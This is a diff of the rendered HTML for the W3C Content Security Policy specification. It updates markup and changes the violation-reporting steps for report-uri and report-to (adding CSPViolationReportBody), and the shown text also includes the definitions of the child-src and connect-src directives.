+         <dt data-md=""><code class="idl"><a data-link-type="idl" href="#dom-securitypolicyviolationevent-disposition" id="ref-for-dom-securitypolicyviolationevent-disposition">disposition</a></code>
+         <dd data-md="">
           <p><var>violation</var>’s <a data-link-type="dfn" href="#violation-disposition" id="ref-for-violation-disposition">disposition</a></p>
-         <dt data-md><code class="idl"><a data-link-type="idl" href="#dom-securitypolicyviolationevent-sourcefile" id="ref-for-dom-securitypolicyviolationevent-sourcefile">sourceFile</a></code>
-         <dd data-md>
+         <dt data-md=""><code class="idl"><a data-link-type="idl" href="#dom-securitypolicyviolationevent-sourcefile" id="ref-for-dom-securitypolicyviolationevent-sourcefile">sourceFile</a></code>
+         <dd data-md="">
           <p>The result of executing the <a data-link-type="dfn" href="https://url.spec.whatwg.org/#concept-url-serializer" id="ref-for-concept-url-serializer⑦">URL serializer</a> on <var>violation</var>’s <a data-link-type="dfn" href="#violation-source-file" id="ref-for-violation-source-file④">source file</a>, with the <code>exclude fragment</code> flag set if the <var>violation</var>’s <a data-link-type="dfn" href="#violation-source-file" id="ref-for-violation-source-file⑤">source file</a> it not <code>null</code> and the empty string otherwise.</p>
-         <dt data-md><code class="idl"><a data-link-type="idl" href="#dom-securitypolicyviolationevent-statuscode" id="ref-for-dom-securitypolicyviolationevent-statuscode">statusCode</a></code>
-         <dd data-md>
+         <dt data-md=""><code class="idl"><a data-link-type="idl" href="#dom-securitypolicyviolationevent-statuscode" id="ref-for-dom-securitypolicyviolationevent-statuscode">statusCode</a></code>
+         <dd data-md="">
           <p><var>violation</var>’s <a data-link-type="dfn" href="#violation-status" id="ref-for-violation-status②">status</a></p>
-         <dt data-md><code class="idl"><a data-link-type="idl" href="#dom-securitypolicyviolationevent-lineno" id="ref-for-dom-securitypolicyviolationevent-lineno①">lineno</a></code>
-         <dd data-md>
+         <dt data-md=""><code class="idl"><a data-link-type="idl" href="#dom-securitypolicyviolationevent-lineno" id="ref-for-dom-securitypolicyviolationevent-lineno①">lineno</a></code>
+         <dd data-md="">
           <p><var>violation</var>’s <a data-link-type="dfn" href="#violation-line-number" id="ref-for-violation-line-number③">line number</a></p>
-         <dt data-md><code class="idl"><a data-link-type="idl" href="#dom-securitypolicyviolationevent-colno" id="ref-for-dom-securitypolicyviolationevent-colno①">colno</a></code>
-         <dd data-md>
+         <dt data-md=""><code class="idl"><a data-link-type="idl" href="#dom-securitypolicyviolationevent-colno" id="ref-for-dom-securitypolicyviolationevent-colno①">colno</a></code>
+         <dd data-md="">
           <p><var>violation</var>’s <a data-link-type="dfn" href="#violation-column-number" id="ref-for-violation-column-number③">column number</a></p>
-         <dt data-md><code class="idl"><a data-link-type="idl" href="#dom-securitypolicyviolationevent-sample" id="ref-for-dom-securitypolicyviolationevent-sample①">sample</a></code>
-         <dd data-md>
+         <dt data-md=""><code class="idl"><a data-link-type="idl" href="#dom-securitypolicyviolationevent-sample" id="ref-for-dom-securitypolicyviolationevent-sample①">sample</a></code>
+         <dd data-md="">
           <p><var>violation</var>’s <a data-link-type="dfn" href="#violation-sample" id="ref-for-violation-sample⑤">sample</a></p>
-         <dt data-md><code class="idl"><a data-link-type="idl" href="https://dom.spec.whatwg.org/#dom-event-bubbles" id="ref-for-dom-event-bubbles">bubbles</a></code>
-         <dd data-md>
+         <dt data-md=""><code class="idl"><a data-link-type="idl" href="https://dom.spec.whatwg.org/#dom-event-bubbles" id="ref-for-dom-event-bubbles">bubbles</a></code>
+         <dd data-md="">
           <p><code>true</code></p>
-         <dt data-md><code class="idl"><a data-link-type="idl" href="https://dom.spec.whatwg.org/#dom-event-composed" id="ref-for-dom-event-composed">composed</a></code>
-         <dd data-md>
+         <dt data-md=""><code class="idl"><a data-link-type="idl" href="https://dom.spec.whatwg.org/#dom-event-composed" id="ref-for-dom-event-composed">composed</a></code>
+         <dd data-md="">
           <p><code>true</code></p>
         </dl>
         <p class="note" role="note"><span>Note:</span> We set the <code class="idl"><a data-link-type="idl" href="https://dom.spec.whatwg.org/#dom-event-composed" id="ref-for-dom-event-composed①">composed</a></code> attribute, which means that this event
   can be captured on its way into, and will bubble its way out of a shadow
   tree. <code class="idl"><a data-link-type="idl" href="https://dom.spec.whatwg.org/#dom-event-target" id="ref-for-dom-event-target">target</a></code>, et al will be automagically scoped correctly for
   the main tree.</p>
-       <li data-md>
+       <li data-md="">
         <p>If <var>violation</var>’s <a data-link-type="dfn" href="#violation-policy" id="ref-for-violation-policy⑥">policy</a>’s <a data-link-type="dfn" href="#policy-directive-set" id="ref-for-policy-directive-set⑦">directive
   set</a> contains a <a data-link-type="dfn" href="#directives" id="ref-for-directives①①">directive</a> named "<a data-link-type="dfn" href="#report-uri" id="ref-for-report-uri①"><code>report-uri</code></a>"
   (<var>directive</var>):</p>
         <ol>
-         <li data-md>
+         <li data-md="">
           <p>If <var>violation</var>’s <a data-link-type="dfn" href="#violation-policy" id="ref-for-violation-policy⑦">policy</a>’s <a data-link-type="dfn" href="#policy-directive-set" id="ref-for-policy-directive-set⑧">directive set</a> contains a <a data-link-type="dfn" href="#directives" id="ref-for-directives①②">directive</a> named
   "<a data-link-type="dfn" href="#report-to" id="ref-for-report-to①"><code>report-to</code></a>", skip the remaining substeps.</p>
-         <li data-md>
+         <li data-md="">
           <p>For each <var>token</var> returned by <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#split-on-ascii-whitespace" id="ref-for-split-on-ascii-whitespace①"> splitting a string on ASCII whitespace</a> with <var>directive</var>’s <a data-link-type="dfn" href="#directive-value" id="ref-for-directive-value⑦">value</a> as the <code>input</code>.</p>
           <ol>
-           <li data-md>
+           <li data-md="">
             <p>Let <var>endpoint</var> be the result of executing the <a data-link-type="dfn" href="https://url.spec.whatwg.org/#concept-url-parser" id="ref-for-concept-url-parser">URL parser</a> with <var>token</var> as the input, and <var>violation</var>’s <a data-link-type="dfn" href="#violation-url" id="ref-for-violation-url②">url</a> as the <a data-link-type="dfn" href="https://url.spec.whatwg.org/#concept-base-url" id="ref-for-concept-base-url">base URL</a>.</p>
-           <li data-md>
+           <li data-md="">
             <p>If <var>endpoint</var> is not a valid URL, skip the remaining substeps.</p>
-           <li data-md>
+           <li data-md="">
             <p>Let <var>request</var> be a new <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request" id="ref-for-concept-request①⑥">request</a>, initialized as follows:</p>
             <dl>
-             <dt data-md><a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request-method" id="ref-for-concept-request-method">method</a>
-             <dd data-md>
+             <dt data-md=""><a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request-method" id="ref-for-concept-request-method">method</a>
+             <dd data-md="">
               <p>"<code>POST</code>"</p>
-             <dt data-md><a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request-url" id="ref-for-concept-request-url⑤">url</a>
-             <dd data-md>
+             <dt data-md=""><a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request-url" id="ref-for-concept-request-url⑤">url</a>
+             <dd data-md="">
               <p><var>violation</var>’s <a data-link-type="dfn" href="#violation-url" id="ref-for-violation-url③">url</a></p>
-             <dt data-md><a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request-origin" id="ref-for-concept-request-origin">origin</a>
-             <dd data-md>
+             <dt data-md=""><a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request-origin" id="ref-for-concept-request-origin">origin</a>
+             <dd data-md="">
               <p><var>violation</var>’s <a data-link-type="dfn" href="#violation-global-object" id="ref-for-violation-global-object⑥">global object</a>’s <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/webappapis.html#relevant-settings-object" id="ref-for-relevant-settings-object">relevant settings
   object</a>’s <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/webappapis.html#concept-settings-object-origin" id="ref-for-concept-settings-object-origin①">origin</a></p>
-             <dt data-md><a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request-window" id="ref-for-concept-request-window">window</a>
-             <dd data-md>
+             <dt data-md=""><a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request-window" id="ref-for-concept-request-window">window</a>
+             <dd data-md="">
               <p>"<code>no-window</code>"</p>
-             <dt data-md><a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request-client" id="ref-for-concept-request-client①④">client</a>
-             <dd data-md>
+             <dt data-md=""><a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request-client" id="ref-for-concept-request-client①④">client</a>
+             <dd data-md="">
               <p><var>violation</var>’s <a data-link-type="dfn" href="#violation-global-object" id="ref-for-violation-global-object⑦">global object</a>’s <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/webappapis.html#relevant-settings-object" id="ref-for-relevant-settings-object①">relevant
   settings object</a></p>
-             <dt data-md><a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request-destination" id="ref-for-concept-request-destination">destination</a>
-             <dd data-md>
+             <dt data-md=""><a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request-destination" id="ref-for-concept-request-destination">destination</a>
+             <dd data-md="">
               <p>"<code>report</code>"</p>
-             <dt data-md><a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request-initiator" id="ref-for-concept-request-initiator">initiator</a>
-             <dd data-md>
+             <dt data-md=""><a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request-initiator" id="ref-for-concept-request-initiator">initiator</a>
+             <dd data-md="">
               <p>""</p>
-             <dt data-md><a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request-credentials-mode" id="ref-for-concept-request-credentials-mode">credentials mode</a>
-             <dd data-md>
+             <dt data-md=""><a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request-credentials-mode" id="ref-for-concept-request-credentials-mode">credentials mode</a>
+             <dd data-md="">
               <p>"<code>same-origin</code>"</p>
-             <dt data-md><a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#request-keepalive-flag" id="ref-for-request-keepalive-flag">keepalive flag</a>
-             <dd data-md>
+             <dt data-md=""><a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#request-keepalive-flag" id="ref-for-request-keepalive-flag">keepalive flag</a>
+             <dd data-md="">
               <p>"<code>true</code>"</p>
-             <dt data-md><a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request-header-list" id="ref-for-concept-request-header-list">header list</a>
-             <dd data-md>
+             <dt data-md=""><a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request-header-list" id="ref-for-concept-request-header-list">header list</a>
+             <dd data-md="">
               <p>A header list containing a single header whose name is
   "<code>Content-Type</code>", and value is "<code>application/csp-report</code>"</p>
-             <dt data-md><a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request-body" id="ref-for-concept-request-body">body</a>
-             <dd data-md>
+             <dt data-md=""><a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request-body" id="ref-for-concept-request-body">body</a>
+             <dd data-md="">
               <p>The result of executing <a href="#deprecated-serialize-violation">§5.2 Obtain the deprecated serialization of violation</a> on <var>violation</var></p>
-             <dt data-md><a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request-redirect-mode" id="ref-for-concept-request-redirect-mode">redirect mode</a>
-             <dd data-md>
+             <dt data-md=""><a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request-redirect-mode" id="ref-for-concept-request-redirect-mode">redirect mode</a>
+             <dd data-md="">
               <p>"<code>error</code>"</p>
             </dl>
             <p class="note" role="note"><span>Note:</span> <var>request</var>’s <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request-mode" id="ref-for-concept-request-mode">mode</a> defaults to "<code>no-cors</code>"; the response is ignored entirely.</p>
-           <li data-md>
+           <li data-md="">
             <p><a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-fetch" id="ref-for-concept-fetch">Fetch</a> <var>request</var>. The result will be ignored.</p>
           </ol>
         </ol>
@@ -3187,31 +3156,70 @@ ISSUE: Bikeshed <code>unsafe-allow-redirects</code>.
         <p class="note" role="note"><span>Note:</span> <code>report-uri</code> only takes effect if <code>report-to</code> is not present. That
   is, the latter overrides the former, allowing for backwards compatibility
   with browsers that don’t support the new mechanism.</p>
-       <li data-md>
+       <li data-md="">
         <p>If <var>violation</var>’s <a data-link-type="dfn" href="#violation-policy" id="ref-for-violation-policy⑧">policy</a>’s <a data-link-type="dfn" href="#policy-directive-set" id="ref-for-policy-directive-set⑨">directive
   set</a> contains a <a data-link-type="dfn" href="#directives" id="ref-for-directives①③">directive</a> named "<a data-link-type="dfn" href="#report-to" id="ref-for-report-to②"><code>report-to</code></a>"
   (<var>directive</var>):</p>
         <ol>
-         <li data-md>
-          <p>Let <var>group</var> be <var>directive</var>’s <a data-link-type="dfn" href="#directive-value" id="ref-for-directive-value⑧">value</a>.</p>
-         <li data-md>
+         <li data-md="">
+          <p>Let <var>body</var> be a new <code class="idl"><a data-link-type="idl" href="#cspviolationreportbody" id="ref-for-cspviolationreportbody">CSPViolationReportBody</a></code>, initialized as
+  follows:</p>
+          <dl>
+           <dt data-md=""><code class="idl"><a data-link-type="idl" href="#dom-cspviolationreportbody-documenturl" id="ref-for-dom-cspviolationreportbody-documenturl">documentURL</a></code>
+           <dd data-md="">
+            <p>The result of executing the <a data-link-type="dfn" href="https://url.spec.whatwg.org/#concept-url-serializer" id="ref-for-concept-url-serializer⑧">URL serializer</a> on <var>violation</var>’s <a data-link-type="dfn" href="#violation-url" id="ref-for-violation-url④">url</a>, with the <code>exclude fragment</code> flag set.</p>
+           <dt data-md=""><code class="idl"><a data-link-type="idl" href="#dom-cspviolationreportbody-referrer" id="ref-for-dom-cspviolationreportbody-referrer">referrer</a></code>
+           <dd data-md="">
+            <p>The result of executing the <a data-link-type="dfn" href="https://url.spec.whatwg.org/#concept-url-serializer" id="ref-for-concept-url-serializer⑨">URL serializer</a> on <var>violation</var>’s <a data-link-type="dfn" href="#violation-referrer" id="ref-for-violation-referrer③">referrer</a>, with the <code>exclude fragment</code> flag set.</p>
+           <dt data-md=""><code class="idl"><a data-link-type="idl" href="#dom-cspviolationreportbody-blockedurl" id="ref-for-dom-cspviolationreportbody-blockedurl">blockedURL</a></code>
+           <dd data-md="">
+            <p>The result of executing the <a data-link-type="dfn" href="https://url.spec.whatwg.org/#concept-url-serializer" id="ref-for-concept-url-serializer①⓪">URL serializer</a> on <var>violation</var>’s <a data-link-type="dfn" href="#violation-resource" id="ref-for-violation-resource①⓪">resource</a>, with the <code>exclude fragment</code> flag set.</p>
+           <dt data-md=""><code class="idl"><a data-link-type="idl" href="#dom-cspviolationreportbody-effectivedirective" id="ref-for-dom-cspviolationreportbody-effectivedirective">effectiveDirective</a></code>
+           <dd data-md="">
+            <p><var>violation</var>’s <a data-link-type="dfn" href="#violation-effective-directive" id="ref-for-violation-effective-directive③">effective directive</a>.</p>
+           <dt data-md=""><code class="idl"><a data-link-type="idl" href="#dom-cspviolationreportbody-originalpolicy" id="ref-for-dom-cspviolationreportbody-originalpolicy">originalPolicy</a></code>
+           <dd data-md="">
+            <p>The <a data-link-type="dfn" href="#serialized-csp" id="ref-for-serialized-csp⑨">serialization</a> of <var>violation</var>’s <a data-link-type="dfn" href="#violation-policy" id="ref-for-violation-policy⑨">policy</a>.</p>
+           <dt data-md=""><code class="idl"><a data-link-type="idl" href="#dom-cspviolationreportbody-sourcefile" id="ref-for-dom-cspviolationreportbody-sourcefile">sourceFile</a></code>
+           <dd data-md="">
+            <p>The result of executing the <a data-link-type="dfn" href="https://url.spec.whatwg.org/#concept-url-serializer" id="ref-for-concept-url-serializer①①">URL serializer</a> on <var>violation</var>’s <a data-link-type="dfn" href="#violation-source-file" id="ref-for-violation-source-file⑥">source file</a>, with the <code>exclude fragment</code> flag set, if <var>violation</var>’s <a data-link-type="dfn" href="#violation-source-file" id="ref-for-violation-source-file⑦">source file</a> is not null, or null
+  otherwise.</p>
+           <dt data-md=""><code class="idl"><a data-link-type="idl" href="#dom-cspviolationreportbody-sample" id="ref-for-dom-cspviolationreportbody-sample">sample</a></code>
+           <dd data-md="">
+            <p><var>violation</var>’s <a data-link-type="dfn" href="#violation-sample" id="ref-for-violation-sample⑥">sample</a>.</p>
+           <dt data-md=""><code class="idl"><a data-link-type="idl" href="#dom-cspviolationreportbody-disposition" id="ref-for-dom-cspviolationreportbody-disposition">disposition</a></code>
+           <dd data-md="">
+            <p><var>violation</var>’s <a data-link-type="dfn" href="#violation-disposition" id="ref-for-violation-disposition①">disposition</a>.</p>
+           <dt data-md=""><code class="idl"><a data-link-type="idl" href="#dom-cspviolationreportbody-statuscode" id="ref-for-dom-cspviolationreportbody-statuscode">statusCode</a></code>
+           <dd data-md="">
+            <p><var>violation</var>’s <a data-link-type="dfn" href="#violation-status" id="ref-for-violation-status③">status</a>.</p>
+           <dt data-md=""><code class="idl"><a data-link-type="idl" href="#dom-cspviolationreportbody-linenumber" id="ref-for-dom-cspviolationreportbody-linenumber">lineNumber</a></code>
+           <dd data-md="">
+            <p><var>violation</var>’s <a data-link-type="dfn" href="#violation-line-number" id="ref-for-violation-line-number④">line number</a>, if <var>violation</var>’s <a data-link-type="dfn" href="#violation-source-file" id="ref-for-violation-source-file⑧">source file</a> is not null,
+  or null otherwise.</p>
+           <dt data-md=""><code class="idl"><a data-link-type="idl" href="#dom-cspviolationreportbody-columnnumber" id="ref-for-dom-cspviolationreportbody-columnnumber">columnNumber</a></code>
+           <dd data-md="">
+            <p><var>violation</var>’s <a data-link-type="dfn" href="#violation-column-number" id="ref-for-violation-column-number④">column number</a>, if <var>violation</var>’s <a data-link-type="dfn" href="#violation-source-file" id="ref-for-violation-source-file⑨">source file</a> is not null,
+  or null otherwise.</p>
+          </dl>
+         <li data-md="">
           <p>Let <var>settings object</var> be <var>violation</var>’s <a data-link-type="dfn" href="#violation-global-object" id="ref-for-violation-global-object⑧">global
   object</a>’s <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/webappapis.html#relevant-settings-object" id="ref-for-relevant-settings-object②">relevant settings object</a>.</p>
-         <li data-md>
+         <li data-md="">
           <p>Execute <a data-link-type="biblio" href="#biblio-reporting">[REPORTING]</a>'s <a data-link-type="dfn" href="https://w3c.github.io/reporting/#queue-report" id="ref-for-queue-report">Queue <var>data</var> as <var>type</var> for <var>endpoint group</var> on <var>settings</var></a> algorithm with the
   following arguments:</p>
           <dl>
-           <dt data-md><var>data</var>
-           <dd data-md>
-            <p><var>violation</var></p>
-           <dt data-md><var>type</var>
-           <dd data-md>
-            <p>"CSP"</p>
-           <dt data-md><var>endpoint group</var>
-           <dd data-md>
-            <p><var>group</var></p>
-           <dt data-md><var>settings</var>
-           <dd data-md>
+           <dt data-md=""><var>data</var>
+           <dd data-md="">
+            <p><var>body</var></p>
+           <dt data-md=""><var>type</var>
+           <dd data-md="">
+            <p>"csp-violation"</p>
+           <dt data-md=""><var>endpoint group</var>
+           <dd data-md="">
+            <p><var>directive</var>’s <a data-link-type="dfn" href="#directive-value" id="ref-for-directive-value⑧">value</a>.</p>
+           <dt data-md=""><var>settings</var>
+           <dd data-md="">
             <p><var>settings object</var></p>
           </dl>
         </ol>
@@ -3233,21 +3241,21 @@ ISSUE: Bikeshed <code>unsafe-allow-redirects</code>.
   include directives that regulate sources of script and plugins. They can do
   so by including:</p>
     <ul>
-     <li data-md>
+     <li data-md="">
       <p>Both the <a data-link-type="dfn" href="#script-src" id="ref-for-script-src">script-src</a> and <a data-link-type="dfn" href="#object-src" id="ref-for-object-src">object-src</a> directives, or</p>
-     <li data-md>
+     <li data-md="">
       <p>a <a data-link-type="dfn" href="#default-src" id="ref-for-default-src">default-src</a> directive</p>
     </ul>
     <p>In either case, developers SHOULD NOT include either <a data-link-type="grammar" href="#grammardef-unsafe-inline" id="ref-for-grammardef-unsafe-inline"><code>'unsafe-inline'</code></a>, or <code>data:</code> as valid
   sources in their policies. Both enable XSS attacks by allowing code to be
   included directly in the document itself; they are best avoided completely.</p>
     <h3 class="heading settled" data-level="6.1" id="directives-fetch"><span class="secno">6.1. </span><span class="content"> Fetch Directives </span><a class="self-link" href="#directives-fetch"></a></h3>
-    <p><dfn class="dfn-paneled" data-dfn-type="dfn" data-export id="fetch-directives">Fetch directives</dfn> control the locations from which certain resource
+    <p><dfn class="dfn-paneled" data-dfn-type="dfn" data-export="" id="fetch-directives">Fetch directives</dfn> control the locations from which certain resource
   types may be loaded. For instance, <a data-link-type="dfn" href="#script-src" id="ref-for-script-src①">script-src</a> allows developers to allow
   trusted sources of script to execute on a page, while <a data-link-type="dfn" href="#font-src" id="ref-for-font-src">font-src</a> controls the
   sources of web fonts.</p>
     <h4 class="heading settled" data-level="6.1.1" id="directive-child-src"><span class="secno">6.1.1. </span><span class="content"><code>child-src</code></span><a class="self-link" href="#directive-child-src"></a></h4>
-    <p>The <dfn class="dfn-paneled" data-dfn-type="dfn" data-export id="child-src"><code>child-src</code></dfn> directive governs the creation of <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/browsers.html#nested-browsing-context" id="ref-for-nested-browsing-context">nested browsing
+    <p>The <dfn class="dfn-paneled" data-dfn-type="dfn" data-export="" id="child-src"><code>child-src</code></dfn> directive governs the creation of <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/browsers.html#nested-browsing-context" id="ref-for-nested-browsing-context">nested browsing
   contexts</a> (e.g. <code><a data-link-type="element" href="https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-iframe-element" id="ref-for-the-iframe-element">iframe</a></code> and <code><a data-link-type="element" href="https://html.spec.whatwg.org/multipage/obsolete.html#frame" id="ref-for-frame">frame</a></code> navigations) and Worker execution
   contexts. The syntax for the directive’s name and value is described by the
   following ABNF:</p>
@@ -3258,35 +3266,35 @@ directive-value = <a data-link-type="grammar" href="#grammardef-serialized-sourc
   worker. More formally, <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request" id="ref-for-concept-request①⑧">requests</a> falling into one of the
   following categories:</p>
     <ul>
-     <li data-md>
+     <li data-md="">
       <p><a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request-destination" id="ref-for-concept-request-destination①">destination</a> is "<code>document</code>", and whose <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request-target-browsing-context" id="ref-for-concept-request-target-browsing-context">target browsing context</a> is a <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/browsers.html#nested-browsing-context" id="ref-for-nested-browsing-context①">nested browsing
  context</a> (e.g. requests which will populate an <code><a data-link-type="element" href="https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-iframe-element" id="ref-for-the-iframe-element①">iframe</a></code> or <code><a data-link-type="element" href="https://html.spec.whatwg.org/multipage/obsolete.html#frame" id="ref-for-frame①">frame</a></code> element)</p>
-     <li data-md>
+     <li data-md="">
       <p><a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request-destination" id="ref-for-concept-request-destination②">destination</a> is either "<code>serviceworker</code>",
  "<code>sharedworker</code>", or "<code>worker</code>" (which are fed to the <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/workers.html#run-a-worker" id="ref-for-run-a-worker①">run a worker</a> algorithm for <code class="idl"><a data-link-type="idl" href="https://w3c.github.io/ServiceWorker/#serviceworker" id="ref-for-serviceworker">ServiceWorker</a></code>, <code class="idl"><a data-link-type="idl" href="https://html.spec.whatwg.org/multipage/workers.html#sharedworker" id="ref-for-sharedworker">SharedWorker</a></code>, and <code class="idl"><a data-link-type="idl" href="https://html.spec.whatwg.org/multipage/workers.html#worker" id="ref-for-worker①">Worker</a></code>,
  respectively).</p>
     </ul>
-    <div class="example" id="example-8573cf3a">
-     <a class="self-link" href="#example-8573cf3a"></a> Given a page with the following Content Security Policy: 
+    <div class="example" id="example-5051221a">
+     <a class="self-link" href="#example-5051221a"></a> Given a page with the following Content Security Policy: 
 <pre><a data-link-type="http-header" href="#header-content-security-policy" id="ref-for-header-content-security-policy③">Content-Security-Policy</a>: <a data-link-type="dfn" href="#child-src" id="ref-for-child-src">child-src</a> https://example.com/
 </pre>
      <p>Fetches for the following code will all return network errors, as the URLs
     provided do not match <code>child-src</code>'s <a data-link-type="dfn" href="#source-lists" id="ref-for-source-lists">source list</a>:</p>
-<pre class="highlight"><c- p>&lt;</c-><c- f>iframe</c-> <c- e>src</c-><c- o>=</c-><c- s>"https://example.org"</c-><c- p>>&lt;/</c-><c- f>iframe</c-><c- p>></c->
-<c- p>&lt;</c-><c- f>script</c-><c- p>></c->
-  <c- a>var</c-> blockedWorker <c- o>=</c-> <c- k>new</c-> Worker<c- p>(</c-><c- u>"data:application/javascript,..."</c-><c- p>);</c->
-<c- p>&lt;/</c-><c- f>script</c-><c- p>></c->
+<pre class="highlight"><span class="p">&lt;</span><span class="nt">iframe</span> <span class="na">src</span><span class="o">=</span><span class="s">"https://example.org"</span><span class="p">>&lt;/</span><span class="nt">iframe</span><span class="p">></span>
+<span class="p">&lt;</span><span class="nt">script</span><span class="p">></span>
+  <span class="kd">var</span> blockedWorker <span class="o">=</span> <span class="k">new</span> Worker<span class="p">(</span><span class="s2">"data:application/javascript,..."</span><span class="p">);</span>
+<span class="p">&lt;/</span><span class="nt">script</span><span class="p">></span>
 </pre>
     </div>
     <h5 class="heading settled algorithm" data-algorithm="child-src Pre-request check" data-level="6.1.1.1" id="child-src-pre-request"><span class="secno">6.1.1.1. </span><span class="content"> <code>child-src</code> Pre-request check </span><a class="self-link" href="#child-src-pre-request"></a></h5>
     <p>This directive’s <a data-link-type="dfn" href="#directive-pre-request-check" id="ref-for-directive-pre-request-check①">pre-request check</a> is as follows:</p>
     <p>Given a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request" id="ref-for-concept-request①⑨">request</a> (<var>request</var>) and a <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object③①">policy</a> (<var>policy</var>):</p>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p>Let <var>name</var> be the result of executing <a href="#effective-directive-for-a-request">§6.7.1 Get the effective directive for request</a> on <var>request</var>.</p>
-     <li data-md>
+     <li data-md="">
       <p>If the result of executing <a href="#should-directive-execute">§6.7.4 Should fetch directive execute</a> on <var>name</var>, <code>child-src</code> and <var>policy</var> is "<code>No</code>", return "<code>Allowed</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>Return the result of executing the <a data-link-type="dfn" href="#directive-pre-request-check" id="ref-for-directive-pre-request-check②">pre-request
   check</a> for the <a data-link-type="dfn" href="#directives" id="ref-for-directives①⑤">directive</a> whose <a data-link-type="dfn" href="#directive-name" id="ref-for-directive-name⑧">name</a> is <var>name</var> on <var>request</var> and <var>policy</var>, using this directive’s <a data-link-type="dfn" href="#directive-value" id="ref-for-directive-value⑨">value</a> for the comparison.</p>
     </ol>
@@ -3294,16 +3302,16 @@ directive-value = <a data-link-type="grammar" href="#grammardef-serialized-sourc
     <p>This directive’s <a data-link-type="dfn" href="#directive-post-request-check" id="ref-for-directive-post-request-check②">post-request check</a> is as follows:</p>
     <p>Given a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request" id="ref-for-concept-request②⓪">request</a> (<var>request</var>), a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-response" id="ref-for-concept-response①⑧">response</a> (<var>response</var>), and a <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object③②">policy</a> (<var>policy</var>):</p>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p>Let <var>name</var> be the result of executing <a href="#effective-directive-for-a-request">§6.7.1 Get the effective directive for request</a> on <var>request</var>.</p>
-     <li data-md>
+     <li data-md="">
       <p>If the result of executing <a href="#should-directive-execute">§6.7.4 Should fetch directive execute</a> on <var>name</var>, <code>child-src</code> and <var>policy</var> is "<code>No</code>", return "<code>Allowed</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>Return the result of executing the <a data-link-type="dfn" href="#directive-post-request-check" id="ref-for-directive-post-request-check③">post-request
   check</a> for the <a data-link-type="dfn" href="#directives" id="ref-for-directives①⑥">directive</a> whose <a data-link-type="dfn" href="#directive-name" id="ref-for-directive-name⑨">name</a> is <var>name</var> on <var>request</var>, <var>response</var>, and <var>policy</var>, using this directive’s <a data-link-type="dfn" href="#directive-value" id="ref-for-directive-value①⓪">value</a> for the comparison.</p>
     </ol>
     <h4 class="heading settled" data-level="6.1.2" id="directive-connect-src"><span class="secno">6.1.2. </span><span class="content"><code>connect-src</code></span><a class="self-link" href="#directive-connect-src"></a></h4>
-    <p>The <dfn class="dfn-paneled" data-dfn-type="dfn" data-export id="connect-src">connect-src</dfn> directive restricts the URLs which can be loaded
+    <p>The <dfn class="dfn-paneled" data-dfn-type="dfn" data-export="" id="connect-src">connect-src</dfn> directive restricts the URLs which can be loaded
   using script interfaces. The syntax for the directive’s name and value is
   described by the following ABNF:</p>
 <pre>directive-name  = "connect-src"
@@ -3313,8 +3321,8 @@ directive-value = <a data-link-type="grammar" href="#grammardef-serialized-sourc
   other origins. This includes APIs like <code>fetch()</code>, <a data-link-type="biblio" href="#biblio-xhr">[XHR]</a>, <a data-link-type="biblio" href="#biblio-eventsource">[EVENTSOURCE]</a>, <a data-link-type="biblio" href="#biblio-beacon">[BEACON]</a>, and <code><a data-link-type="element" href="https://html.spec.whatwg.org/multipage/text-level-semantics.html#the-a-element" id="ref-for-the-a-element">a</a></code>'s <code><a data-link-type="element-sub" href="https://html.spec.whatwg.org/multipage/text-level-semantics.html#dom-a-ping" id="ref-for-dom-a-ping">ping</a></code>. This directive <em>also</em> controls
